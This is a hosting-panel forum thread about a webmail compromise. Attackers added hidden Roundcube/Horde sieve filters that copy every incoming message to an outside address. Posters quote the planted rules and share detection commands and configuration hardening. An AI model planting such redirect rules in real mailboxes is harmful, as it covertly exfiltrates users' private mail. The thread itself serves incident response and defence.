• Hi, Pleskians! We are running a UX testing of our upcoming product intended for server management and monitoring.
    We would like to invite you to have a call with us and have some fun checking our prototype. The agenda is pretty simple - we bring new design and some scenarios that you need to walk through and succeed. We will be watching and taking insights for further development of the design.
    If you would like to participate, please use this link to book a meeting. We will sent the link to the clickable prototype at the meeting.
  • (Plesk for Windows):
    MySQL Connector/ODBC 3.51, 5.1, and 5.3 are no longer shipped with Plesk because they have reached end of life. MariaDB Connector/ODBC 64-bit 3.2.4 is now used instead.
  • The Horde webmail has been deprecated. Its complete removal is scheduled for April 2025. For details and recommended actions, see the Feature and Deprecation Plan.

Issue dovecot / roundcube sieve hack

tkalfaoglu

tkalfaoglu

Silver Pleskian
Today a customer complained that their email might be compromised.
I found that a single email address had a sieve added:

.dovecot.sieve -> sieve/roundcube.sieve

and that file contained:
# rule:[.]
if allof (header :contains "from" "@")
{
redirect :copy "[email protected]";
}
require ["copy"];

PS: You may wish to do a check of your systems, just do a:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec echo grep redirect {} \;

My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Thanks, -tk
 
PS: this gmail email address appears in the whois registry of prornec.com which is located in Lagos, Nigeria!
 
PS: Looking at PLESK mail accounts page, there appears to be NO redirect.
Perhaps PLESK should also check these sieve settings when it displays the list of emails - and not only the redirects that have been placed using the PLESK interface..
 
prornec.com domain was hosted in servers in Romania, with IP ranges of:
45.89.175.0 - 45.89.175.255
 
Sorry - the command should have been:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec grep redirect {} \;

the echo was my debug version :) -t
 
tkalfaoglu said:
My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Click to expand...
Have a look a the config file from Roundcubes managesieve plugin. There are some options that might prevent creating similar rules trough Roundcube. The $config['managesieve_raw_editor'] and $config['managesieve_forward'] seem useful options to restrict in this regard.

Needless to say that it is always best to make every effort to protect user/email accounts so to prevent unauthorized access in the first place.
 
Many thanks.. the forward option does not contain a disable option..

Code: 
// Enables separate management interface for setting forwards (redirect to and copy to)
// 0 - no separate section (default),
// 1 - add Forward section,
// 2 - add Forward section, but hide Filters section
$config['managesieve_forward'] = 0;

In any case, I changed it to 2 and will check its impact. Likewise I'm going to disable the managesieve plugin.
 
I noticed the same issue with Horde as well. Someone hacked some people's ingo.sieve files to put redirects..
Nothing visible in the plesk interface, so I assume it was done via the horde interface.
 
We had same issue, highly recommend every one to check their sieve(.dovecot.sieve, roundcube.sieve, ingo.sieve) files, you can check with this simple line:

find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep 'copy'
or
find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep '@'

Notice, some of these filters can be user set, check them with users.


Sample of our findings:


#1

if allof (header :contains "subject" "@")
{
redirect :copy "[email protected]";
}
require ["fileinto"];
require "fileinto";

#2

if true
{
redirect :copy "[email protected]";
}
 
Just to document here in case anyone else if ever looking for the possibility to disable the redirect/copy to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

in /usr/share/psa-roundcube/plugins/managesieve/config.inc.php add redirect to the managesieve_disabled_actions param, i.e.:
Code: 
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
 
ChristophRo said:
Just to document here in case anyone else if ever looking for the possibility to disable the redirect/copy to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

in /usr/share/psa-roundcube/plugins/managesieve/config.inc.php add redirect to the managesieve_disabled_actions param, i.e.:
Code: 
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
Click to expand...
As an additional note, this only works for RC version 1.5 and up. Which is currently is not available on Plesk for CentOS 7.9 and Ubuntu 18.04.
 
Hi,

I'm bumping this thread because, in addition to the copy and redirect roundcube filters discussed here, I've come across another roundcube hack symptom: creating a new "fake" identity.

To check this you must log to the plesk db:
Code: 
plesk db;
use roundcubemail;
select user_id, changed, del,name, email from identities;

On the select output check the email column, it usually is an email not hosted on the server.
 
JVG said:
Hi,

I'm bumping this thread because, in addition to the copy and redirect roundcube filters discussed here, I've come across another roundcube hack symptom: creating a new "fake" identity.

To check this you must log to the plesk db:
Code: 
plesk db;
use roundcubemail;
select user_id, changed, del,name, email from identities;

On the select output check the email column, it usually is an email not hosted on the server.
Click to expand...
Yes, sadly identity creation is unrestricted in Roundcube by default. You can restrict the creation of additional identities in Roundcube with the $config['identities_level'] option using a value of either 3 or 4 in the config.inc.php file.

All config options for identities_level are explained here:
github.com

roundcubemail/config/defaults.inc.php at master · roundcube/roundcubemail

The Roundcube Webmail suite. Contribute to roundcube/roundcubemail development by creating an account on GitHub.
github.com github.com
 
  • Like
Reactions: JVG
Kaspar said:
Yes, sadly identity creation is unrestricted in Roundcube by default. You can restrict the creation of additional identities in Roundcube with the $config['identities_level'] option using a value of either 3 or 4 in the config.inc.php file.

All config options for identities_level are explained here:
github.com

roundcubemail/config/defaults.inc.php at master · roundcube/roundcubemail

The Roundcube Webmail suite. Contribute to roundcube/roundcubemail development by creating an account on GitHub.
github.com github.com
Click to expand...
Didn't know this option, perfect!

Also, I would recommend turning on the userlogins option: $config['log_logins'] = true;
 
You must log in or register to reply here.

Similar threads

W
Issue Mail forwarded on the server in the target mailbox is delivered to the SPAM folder
Replies
0
Views
301
W4ru
W
M
Issue Qmail / Dovecot - mail forwarding fails endlessly
Replies
5
Views
3K
mw004
M
T
Resolved dovecot webmail filters missing after upgrade 17.5 to 17.8#4
Replies
1
Views
2K
TomBoB
T
G J Piper
Resolved Global Dovecot Sieve Rule?
Replies
17
Views
16K
giannisantoua
G
N
Issue [PPP-27056] Sendmail problems w/ sieve
Replies
12
Views
4K
IgorG
IgorG
Back
Top